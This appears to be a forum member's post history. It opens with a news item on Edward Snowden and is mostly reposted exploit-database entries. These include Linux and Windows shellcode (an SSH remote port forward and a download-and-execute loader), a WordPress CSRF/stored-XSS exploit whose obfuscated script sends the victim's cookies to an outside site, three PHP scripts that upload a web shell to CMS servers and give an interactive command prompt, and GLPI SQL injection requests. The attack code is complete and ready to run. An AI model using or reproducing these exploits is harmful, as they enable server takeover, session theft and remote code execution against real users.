Everything posted by Matt

  1. Former consultant Edward Snowden, responsible for the leaks about the American Internet and telecommunications surveillance programs, has been charged with espionage by the American justice system, which has asked Hong Kong to arrest him. The young man, who has been a refugee in Hong Kong since May 20, has also been charged with theft and illegal use of government property, AFP reports. He is the subject of a provisional arrest warrant, says the Washington Post, citing American officials speaking anonymously. An extradition treaty is in force between Hong Kong and the United States, but Beijing has the right to oppose it by veto. Contacted by AFP, the Department of Justice did not respond on Friday evening. "The American government will not be able to stifle (this case) by arresting or killing me," the former consultant of the American National Security Agency (NSA) said on Monday during a live exchange with users of The Guardian's website. "The truth has been revealed and cannot be stopped," he added. Originally from Hawaii, where he worked for an American intelligence subcontractor, Snowden, who turned 30 on Friday, took refuge in Hong Kong on the basis of that territory's tradition of defending freedoms. A businessman linked to the WikiLeaks website revealed on Thursday evening that Icelanders are preparing a flight to their country for him. In an interview with The Guardian on June 9, he said that Iceland is the country closest to his values regarding a free Internet independent of the state. Source: Business24.Ro
  2. Violent Championship Wrestling.
  3. Author : Hamza Megahed Source : Linux/x86 Remote Port Forwarding Shellcode 87 bytes Vulnerable App : N/A Code : ***************************************************** * Linux/x86 Remote Port forwarding 87 bytes * * ssh -R 9999:localhost:22 192.168.0.226 * ***************************************************** * Author: Hamza Megahed * ***************************************************** * Twitter: @Hamza_Mega * ***************************************************** * blog: hamza-mega[dot]blogspot[dot]com * ***************************************************** * E-mail: hamza[dot]megahed[at]gmail[dot]com * ***************************************************** xor %eax,%eax push %eax pushl $0x3632322e pushl $0x30302e38 pushl $0x36312e32 pushw $0x3931 movl %esp,%esi push %eax push $0x32323a74 push $0x736f686c push $0x61636f6c push $0x3a393939 pushw $0x3930 movl %esp,%ebp push %eax pushw $0x522d movl %esp,%edi push %eax push $0x6873732f push $0x6e69622f push $0x7273752f movl %esp,%ebx push %eax push %esi push %ebp push %edi push %ebx movl %esp,%ecx mov $0xb,%al int $0x80 ******************************** #include <stdio.h> #include <string.h> char *shellcode = "\x31\xc0\x50\x68\x2e\x32\x32\x36\x68\x38\x2e\x30\x30\x68\x32\x2e\x31\x36" "\x66\x68\x31\x39\x89\xe6\x50\x68\x74\x3a\x32\x32\x68\x6c\x68\x6f\x73\x68" "\x6c\x6f\x63\x61\x68\x39\x39\x39\x3a\x66\x68\x30\x39\x89\xe5\x50\x66\x68" "\x2d\x52\x89\xe7\x50\x68\x2f\x73\x73\x68\x68\x2f\x62\x69\x6e\x68\x2f\x75" "\x73\x72\x89\xe3\x50\x56\x55\x57\x53\x89\xe1\xb0\x0b\xcd\x80"; int main(void) { fprintf(stdout,"Length: %d\n",strlen(shellcode)); (*(void(*)()) shellcode)(); return 0; }
  4. Author : RubberDuck Source : Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Vulnerable App : N/A Code : /* Title: Allwin URLDownloadToFile + WinExec + ExitProcess Shellcode Date: 2013-22-01 Author: RubberDuck Web: http://bflow.security-portal.cz http://www.security-portal.cz Tested on: Win 2k, Win XP Home SP2/SP3 CZ (32), Win 7 (32/64) -- file is downloaded from URL http://bflow.security-portal.cz/down/xy.txt -- xy.txt - http://www.virustotal.com/file/7d0d68f8e378d5aa29620c749f797d1d5fa05356fbf6f9ca64ba00f00fe86182/analysis/1358866648/ -- xy.txt only shows MessageBox with text "Test application for Allwin URLDownloadToFile shellcode" and title ">> Author: RubberDuck - http://bflow.security-portal.cz <<" */ #include <windows.h> #include <stdio.h> int main(){ unsigned char shellcode[] = "\x33\xC9\x64\x8B\x41\x30\x8B\x40\x0C\x8B" "\x70\x14\xAD\x96\xAD\x8B\x58\x10\x8B\x53" "\x3C\x03\xD3\x8B\x52\x78\x03\xD3\x8B\x72" "\x20\x03\xF3\x33\xC9\x41\xAD\x03\xC3\x81" "\x38\x47\x65\x74\x50\x75\xF4\x81\x78\x04" "\x72\x6F\x63\x41\x75\xEB\x81\x78\x08\x64" "\x64\x72\x65\x75\xE2\x8B\x72\x24\x03\xF3" "\x66\x8B\x0C\x4E\x49\x8B\x72\x1C\x03\xF3" "\x8B\x14\x8E\x03\xD3\x33\xC9\x51\x68\x2E" "\x65\x78\x65\x68\x64\x65\x61\x64\x53\x52" "\x51\x68\x61\x72\x79\x41\x68\x4C\x69\x62" "\x72\x68\x4C\x6F\x61\x64\x54\x53\xFF\xD2" "\x83\xC4\x0C\x59\x50\x51\x66\xB9\x6C\x6C" "\x51\x68\x6F\x6E\x2E\x64\x68\x75\x72\x6C" "\x6D\x54\xFF\xD0\x83\xC4\x10\x8B\x54\x24" "\x04\x33\xC9\x51\x66\xB9\x65\x41\x51\x33" "\xC9\x68\x6F\x46\x69\x6C\x68\x6F\x61\x64" "\x54\x68\x6F\x77\x6E\x6C\x68\x55\x52\x4C" "\x44\x54\x50\xFF\xD2\x33\xC9\x8D\x54\x24" "\x24\x51\x51\x52\xEB\x47\x51\xFF\xD0\x83" "\xC4\x1C\x33\xC9\x5A\x5B\x53\x52\x51\x68" "\x78\x65\x63\x61\x88\x4C\x24\x03\x68\x57" "\x69\x6E\x45\x54\x53\xFF\xD2\x6A\x05\x8D" "\x4C\x24\x18\x51\xFF\xD0\x83\xC4\x0C\x5A" "\x5B\x68\x65\x73\x73\x61\x83\x6C\x24\x03" "\x61\x68\x50\x72\x6F\x63\x68\x45\x78\x69" "\x74\x54\x53\xFF\xD2\xFF\xD0\xE8\xB4\xFF" "\xFF\xFF" // 
http://bflow.security-portal.cz/down/xy.txt "\x68\x74\x74\x70\x3A\x2F\x2F\x62" "\x66\x6C\x6F\x77\x2E\x73\x65\x63\x75\x72" "\x69\x74\x79\x2D\x70\x6F\x72\x74\x61\x6C" "\x2E\x63\x7A\x2F\x64\x6F\x77\x6E\x2F\x78" "\x79\x2E\x74\x78\x74\x00"; LPVOID lpAlloc = NULL; void (*pfunc)(); lpAlloc = VirtualAlloc(0, 4096, MEM_COMMIT, PAGE_EXECUTE_READWRITE); if(lpAlloc == NULL){ printf("Memory isn't allocated!\n"); return 0; } memcpy(lpAlloc, shellcode, lstrlenA((LPCSTR)shellcode) + 1); pfunc = (void ())lpAlloc; pfunc(); return 0; }
  5. Author : expl0i13r Source : http://www.exploit-db.com/exploits/26124/ Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/2f4ba0fd6af11f2638c95f1083f41993-wp-sendsms.1.0.zip Code : ==================================== __ __ _ ___ _ __ ____ \ \ / / | | / _ \ (_) /_ | |___ \ ___ \ V / _ __ | | | | | | _ | | __) | _ __ / _ \ > < | '_ \ | | | | | | | | | | |__ < | '__| | __/ / . \ | |_) | | | | |_| | | | | | ___) | | | \___| /_/ \_\ | .__/ |_| \___/ |_| |_| |____/ |_| | | |_| blackpentesters.blogspot.com ============================================================= ########################################################################################### # Exploit Title: [ Wordpress WP-SendSMS v1.0 Plugin CSRF and Stored XSS Vulnerabilities] # # Date: [2013-6-9] # # Exploit Author: [expl0i13r] # # Vendor Homepage: [http://wordpress.org/plugins/wp-sendsms/] # # Software Link: [http://downloads.wordpress.org/plugin/wp-sendsms.1.1.zip] # # Version: [1.0] # # Tested on: [Wordpress 3.5.1 (Windows)] # # Contact: expl0i13r@gmail.com # ########################################################################################### Summary: ======== 1. Plugin Description 2. CSRF to Trigger Stored XSS 3. Stored XSS Details 1. Plugin Description: ======================== WP-SendSMS is WordPress Plugin for allowing user to send SMS using SMS Gateway. This Plugin allows site owner to add SMS Gateway in Plugin Setting Page. 2. CSRF to Trigger Stored XSS : =============================== Vulnerability Description: --------------------------- This wordpress plugin "WP-SendSMS 1.0" suffers from CSRF vulnerability which can be successfully exploited to trigger Stored XSS vulnerability which in turn sends Wordpress logged in user's cookie to attacker's website. Attacker can also exploit this CSRF vulnerability to change SMS Settings. 
Affected URL: -------------- http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms eXpl0it code: -------------- <html> <head> <script type="text/javascript" language="javascript"> function submitform() { document.getElementById('myForm').submit(); } </script> </head> <body> <form name="myForm" action="http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms" method="post"> <textarea name="wpsms_api1" id="wpsms_api1" class="regular-text" cols="100" rows="5">http://blackpentesters.blogspot.com/smsapi.php?username=yourusername&password=yourpassword&mobile=[Mobile]&sms=[TextMessage]&senderid=[SenderID]</textarea> <input type="text" name="sender_id" id="sender_id" value="eXpl0i13r"> <input type="checkbox" name="remove_bad_words" id="remove_bad_words" checked="checked" value="1"> # Below Field Contains XSS Payload for sending Cookies to attacker website : # In my case this will redirect you to http://blackpentesters.blogspot.com+cookies <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" 
value=""><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script>"> <input type="checkbox" name="captcha" id="captcha" checked="checked" value="1"> <input type="text" name="captcha_width" class="captcha_option_input" value="" id="acpro_inp4"> <input type="text" name="captcha_height" class="captcha_option_input" value="" id="acpro_inp5"> <input type="text" name="captcha_characters" class="captcha_option_input" value="4" id="acpro_inp6"> <input type="checkbox" name="confirm_page" id="confirm_page" checked="checked" value="1"> <input type="checkbox" name="allow_without_login" id="allow_without_login" checked="checked" value="1"> <input type="checkbox" name="custom_response" id="custom_response" value="1"> <textarea name="custom_response_text" cols="100" rows="5"></textarea> <input type="hidden" name="settings_submit" value="true"> <input type="submit" value="Update Settings" class="button-primary"> </form> <script type="text/javascript" language="javascript"> document.myForm.submit() </script> </body> </html> Stored XSS Details : ===================== URL: ===== 
http://127.0.0.1/wordpress-3.5.1/wordpress/wp-admin/admin.php?page=sms Stored XSS Vulnerable Parameters: ================================== 1. sender_id 2. maximum_characters 3. captcha_width 4. captcha_height 4. captcha_characters HTML Code : ------------- <input type="text" name="sender_id" id="sender_id" value=""> <input type="text" name="maximum_characters" class="maximum_characters" id="maximum_characters" value=""> <input type="text" name="captcha_width" class="captcha_option_input" value="1" id="acpro_inp4"> <input type="text" name="captcha_height" class="captcha_option_input" value="1" id="acpro_inp5"> <input type="text" name="captcha_characters" class="captcha_option_input" value="" id="acpro_inp6"> XSS Payload Used: ------------------ "><script>location=String.fromCharCode(104)+String.fromCharCode(116)+String.fromCharCode(116)+String.fromCharCode(112)+String.fromCharCode(58)+String.fromCharCode(47)+String.fromCharCode(47)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(97)+String.fromCharCode(99)+String.fromCharCode(107)+String.fromCharCode(112)+String.fromCharCode(101)+String.fromCharCode(110)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(115)+String.fromCharCode(116)+String.fromCharCode(101)+String.fromCharCode(114)+String.fromCharCode(115)+String.fromCharCode(46)+String.fromCharCode(98)+String.fromCharCode(108)+String.fromCharCode(111)+String.fromCharCode(103)+String.fromCharCode(115)+String.fromCharCode(112)+String.fromCharCode(111)+String.fromCharCode(116)+String.fromCharCode(46)+String.fromCharCode(99)+String.fromCharCode(111)+String.fromCharCode(109)+String.fromCharCode(47)+String.fromCharCode(63)+document.cookie</script> Each of above parameters can be exploited by attacker through CSRF vulnerability for stealing Cookies. 
################################## # eXpl0i13r # # ------------------------------ # #|blackpentesters.blogspot.com |# #|infotech-knowledge.blogspot.in|# # ------------------------------ # ##################################
  6. Author : CWH Underground Source : Havalite CMS 1.1.7 - Unrestricted File Upload Exploit Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/cbd391e913d04224225cf924a7fcb2b5-havalite_1.1.7.zip Code : <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : Havalite CMS Unrestricted File Upload Exploit Date : 16 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://havalite.com/ Software Link : http://jaist.dl.sourceforge.net/project/havalite/havalite_1.1.7.zip Version : 1.1.7 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### /havalite/upload.php ##################################################### DESCRIPTION ##################################################### Restricted access to this script isn't properly realized (Don't require authentication) , so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. 
##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------------------------------+"; print "\n| Havalite CMS Unrestricted File Upload Exploit |"; print "\n+-----------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /havalite/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"files[]\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "POST {$path}havalite/upload.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Referee: {$host}{$path}havalite/hava_upload.php\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}/havalite/tmp/files/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nHavalite-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>
  7. Author : CWH Underground Source : Fly-High CMS 2012-07-08 - Unrestricted File Upload Exploit Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/2247a46025f3b85ab7705b8c2d0f2215-2012-07-08_unstable.zip Code : <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : Fly-High CMS Unrestricted File Upload Exploit Date : 15 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://sourceforge.net/projects/flyhighcms/ Software Link : http://jaist.dl.sourceforge.net/project/flyhighcms/unstable/2012-07-08_unstable.zip Version : 2012-07-08 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### /resources/upload.php (LINE: 30, 60-61) ----------------------------------------------------------------------------- Line: 30 $targetDir = "../" . $_GET['pfad']; ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- Line: 60-61 if (!file_exists($targetDir)) @mkdir($targetDir); ----------------------------------------------------------------------------- ----------------------------------------------------------------------------- Line: 55-57 $fileName = 'upload_' . $count . $fileName_b; $filePath = $targetDir . DIRECTORY_SEPARATOR . $fileName; ----------------------------------------------------------------------------- ##################################################### DESCRIPTION ##################################################### An attacker might write to arbitrary files or inject arbitrary code into a file with this vulnerability. 
User tainted data is used when creating the file name that will be opened or when creating the string that will be written to the file. An attacker can try to write arbitrary PHP code in a PHP file allowing to fully compromise the server. ##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+----------------------------------------------+"; print "\n| Fly-High CMS Unrestricted File Upload Exploit |"; print "\n+----------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /flyhighCMS/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $packet = "POST {$path}resources/upload.php?pfad=cwh&name=1.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet1 = "GET {$path}cwh/upload_1.php HTTP/1.0\r\n"; $packet1 .= "Host: {$host}\r\n"; $packet1 .= "Cmd: %s\r\n"; $packet1 .= "Connection: close\r\n\r\n"; while(1) { print "\nFlyhigh-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet1, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ?>
  8. Author : CWH Underground Source : imacs CMS 0.3.0 - Unrestricted File Upload Exploit Vulnerable App : http://www.exploit-db.com/wp-content/themes/exploit/applications/80ed91cbab87f82f42b4a712d5fb2bd9-imacs_V0_3_0_608.cmp.zip Code : <?php /* ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' Exploit Title : imacs CMS Unrestricted File Upload Exploit Date : 18 June 2013 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://jrcmsdev.sourceforge.net/ Software Link : http://jaist.dl.sourceforge.net/project/jrcmsdev/imacs_V0_3_0_608.cmp.zip Version : 0.3.0 Tested on : Window and Linux ##################################################### VULNERABILITY: Unrestricted File Upload ##################################################### /src/assets/mng/mng.php ##################################################### DESCRIPTION ##################################################### Restricted access to this script isn't properly realized (Don't require authentication) , so an attacker might be able to upload arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked. 
##################################################### EXPLOIT ##################################################### */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n==============================================\n"; print " imacs CMS Unrestricted File Upload Exploit \n"; print " \n"; print " Discovered By CWH Underground \n"; print "==============================================\n\n"; print " ,--^----------,--------,-----,-------^--, \n"; print " | ||||||||| `--------' | O \n"; print " `+---------------------------^----------| \n"; print " `\_,-------, _________________________| \n"; print " / XXXXXX /`| / \n"; print " / XXXXXX / `\ / \n"; print " / XXXXXX /\______( \n"; print " / XXXXXX / \n"; print " / XXXXXX / .. CWH Underground Hacking Team .. \n"; print " (________( \n"; print " `------' \n\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /imacs/\n"; die(); } $host = $argv[1]; $path = $argv[2]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"upload\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: application/octet-stream\r\n\r\n"; $payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n"; $payload .= "--o0oOo0o--\r\n"; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; $response = http_send($host, $packet); if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n"); $packet = "POST {$path}src/assets/mng/mng.php?dir= HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$sid[1]}\r\n"; $packet .= "Content-Length: 
".strlen($payload)."\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n{$payload}"; http_send($host, $packet); $packet = "GET {$path}content/uploads/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while(1) { print "\nimacs-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } ################################################################################################################ # Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ ?>
  9. Author : LiquidWorm Source : GLPI v0.83.8 - Multiple Vulnerabilities Code : GLPI v0.83.8 Multiple Error-based SQL Injection Vulnerabilities Vendor: INDEPNET Development Team Product web page: http://www.glpi-project.org Affected version: 0.83.7 and 0.83.8 Summary: GLPI, an initialism for Gestionnaire libre de parc informatique (Free Management of Computer Equipment), was designed by Indepnet Association (a non profit organisation) in 2003. GLPI is a free asset and IT management software package, it also offers functionalities like servicedesk ITIL or license tracking and software auditing. Desc: Input passed via the POST parameter 'users_id_assign' in '/ajax/ticketassigninformation.php' script, POST parameter 'filename' in '/front/document.form.php' script, and POST parameter 'table' in 'glpi/ajax/comments.php' script is not properly sanitised before being used in SQL queries. This can be exploited by a malicious attacker to manipulate SQL queries by injecting arbitrary SQL code in the affected application. 
====================================================================== /inc/db.function.php: --------------------- 274: function countElementsInTable($table, $condition="") { 275: global $DB; 276: 277: if (is_array($table)) { 278: $table = implode('`,`',$table); 279: } 280: 281: $query = "SELECT COUNT(*) AS cpt 282: FROM `$table`"; 283: 284: if (!empty($condition)) { 285: $query .= " WHERE $condition "; 286: } 287: 288: $result =$DB->query($query); 289: $ligne = $DB->fetch_array($result); 290: return $ligne['cpt']; 291: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SELECT COUNT(*) AS cpt FROM `glpi_tickets`,`glpi_tickets_users` WHERE `glpi_tickets_users`.`tickets_id` = `glpi_tickets`.`id` AND `glpi_tickets_users`.`users_id` = \'2\'\' AND `glpi_tickets_users`.`type` = \'2\' AND `glpi_tickets`.`is_deleted` = 0 AND `glpi_tickets`.`status` NOT IN (\'solved\', \'closed\') Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2' AND `glpi_tickets`.`is_deleted` = 0 ' at line 3 Backtrace : /var/www/html/glpi/inc/db.function.php :288 DBmysql->query() /var/www/html/glpi/inc/commonitilobject.class.php :362 countElementsInTable() /var/www/html/glpi/ajax/ticketassigninformation.php :66 CommonITILObject->countActiveObjectsForTech() /var/www/html/glpi/ajax/ticketassigninformation.php ====================================================================== /inc/document.class.php: ------------------------ 1221: static function isValidDoc($filename) { 1222: global $DB; 1223: 1224: $splitter = explode(".",$filename); 1225: $ext = end($splitter); 1226: 1227: $query="SELECT * 1228: FROM `glpi_documenttypes` 1229: WHERE `ext` LIKE '$ext' 1230: AND `is_uploadable`='1'"; 1231: 1232: if ($result = $DB->query($query)) { 1233: if ($DB->numrows($result)>0) { 1234: return Toolbox::strtoupper($ext); 1235: } 1236: } 1237: return ""; 1238: } 
---------------------------------------------------------------------- *** MySQL query error : *** SQL: SELECT * FROM `glpi_documenttypes` WHERE `ext` LIKE \'1\'\' AND `is_uploadable`=\'1\' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1'' at line 3 Backtrace : /var/www/html/glpi/inc/document.class.php :1232 DBmysql->query() /var/www/html/glpi/inc/document.class.php :1088 Document::isValidDoc() /var/www/html/glpi/inc/document.class.php :275 Document::uploadDocument() /var/www/html/glpi/inc/commondbtm.class.php :878 Document->prepareInputForUpdate() /var/www/html/glpi/front/document.form.php :99 CommonDBTM->update() /var/www/html/glpi/front/document.form.php ====================================================================== /inc/dbmysql.class.php: ----------------------- 364: function list_tables($table="glpi_%") { 365: return $this->query("SHOW TABLES LIKE '".$table."'"); 366: } ---------------------------------------------------------------------- *** MySQL query error : *** SQL: SHOW TABLES LIKE \'%glpi_users\'%\' Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '%'' at line 1 Backtrace : /var/www/html/glpi/glpi/inc\dbmysql.class.php :365 DBmysql->query() /var/www/html/glpi/inc/db.function.php :1182 DBmysql->list_tables() /var/www/html/glpi/ajax/comments.php :47 TableExists() /var/www/html/glpi/ajax/comments.php ====================================================================== Tested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7 Linux CentOS 6.0 (Final) - Apache/2.2.15, PHP/5.3.3 Vulnerabilities discovered by Humberto Cabrera @dniz0r Zero Science Lab - http://www.zeroscience.mk Advisory ID: ZSL-2013-5145 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5145.php 09.05.2013 ---------------- {1} POST 
/glpi/ajax/ticketassigninformation.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://localhost/glpi/front/ticket.form.php
Content-Length: 17
Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

users_id_assign=2{SQL_Injection}

----------------

{2}

POST /glpi/front/document.form.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/glpi/front/document.form.php?id=4
Cookie: PHPSESSID=5ducm98racrn23u3bl0kq8ap02
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------19302542618340
Content-Length: 1699

-----------------------------19302542618340
Content-Disposition: form-data; name="entities_id"

0
-----------------------------19302542618340
Content-Disposition: form-data; name="is_recursive"

0
-----------------------------19302542618340
Content-Disposition: form-data; name="name"

test
-----------------------------19302542618340
Content-Disposition: form-data; name="comment"

test
-----------------------------19302542618340
Content-Disposition: form-data; name="current_filepath"

-----------------------------19302542618340
Content-Disposition: form-data; name="current_filename"

-----------------------------19302542618340
Content-Disposition: form-data; name="filename"; filename=1{SQL_Injection}
Content-Type: application/octet-stream

-----------------------------19302542618340
Content-Disposition: form-data; name="upload_file"

-----------------------------19302542618340
Content-Disposition: form-data; name="link"

test
-----------------------------19302542618340
Content-Disposition: form-data; name="documentcategories_id"

0
-----------------------------19302542618340
Content-Disposition: form-data; name="mime"

application/octet-stream
-----------------------------19302542618340
Content-Disposition: form-data; name="update"

Update
-----------------------------19302542618340
Content-Disposition: form-data; name="_read_date_mod"

2013-06-14 20:27:56
-----------------------------19302542618340
Content-Disposition: form-data; name="id"

4
-----------------------------19302542618340
Content-Disposition: form-data; name="_glpi_csrf_token"

f27853afa3e705b5042c0ae4d135679c
-----------------------------19302542618340--

----------------

{3}

POST /glpi/ajax/comments.php HTTP/1.1
Host: localhost
Proxy-Connection: keep-alive
Content-Length: 59
Origin: http://localhost
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.110 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Referer: http://localhost/glpi/front/planning.php
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Cookie: PHPSESSID=frk5prfmarsc9ebo1u751skkb2

value=5&table=glpi_users{SQL Injection}&withlink=comment_link_uID302668907

----------------

#################################################################################################################

GLPI v0.83.7 (itemtype) Parameter Traversal Arbitrary File Access Exploit

Vendor: INDEPNET Development Team
Product web page: http://www.glpi-project.org
Affected version: 0.83.7

Summary: GLPI, an initialism for Gestionnaire libre de parc informatique (Free Management of Computer Equipment), was designed by Indepnet Association (a non profit organisation) in 2003. GLPI is a free asset and IT management software package, it also offers functionalities like servicedesk ITIL or license tracking and software auditing.

Desc: GLPI suffers from a file inclusion vulnerability (LFI) when input passed thru the 'filetype' parameter to 'common.tabs.php' script is not properly verified before being used to include files. This can be exploited to include files from local resources with directory traversal attacks and URL encoded NULL bytes.

========================================================================
/ajax/common.tabs.php:
----------------------

46: if (!isset($_REQUEST['itemtype']) || empty($_REQUEST['itemtype'])) {
47: exit();

62: $item = new $_REQUEST['itemtype'])();

========================================================================

Tested on: Microsoft Windows 7 Ultimate SP1 (EN) - Apache/2.4.3, PHP/5.4.7
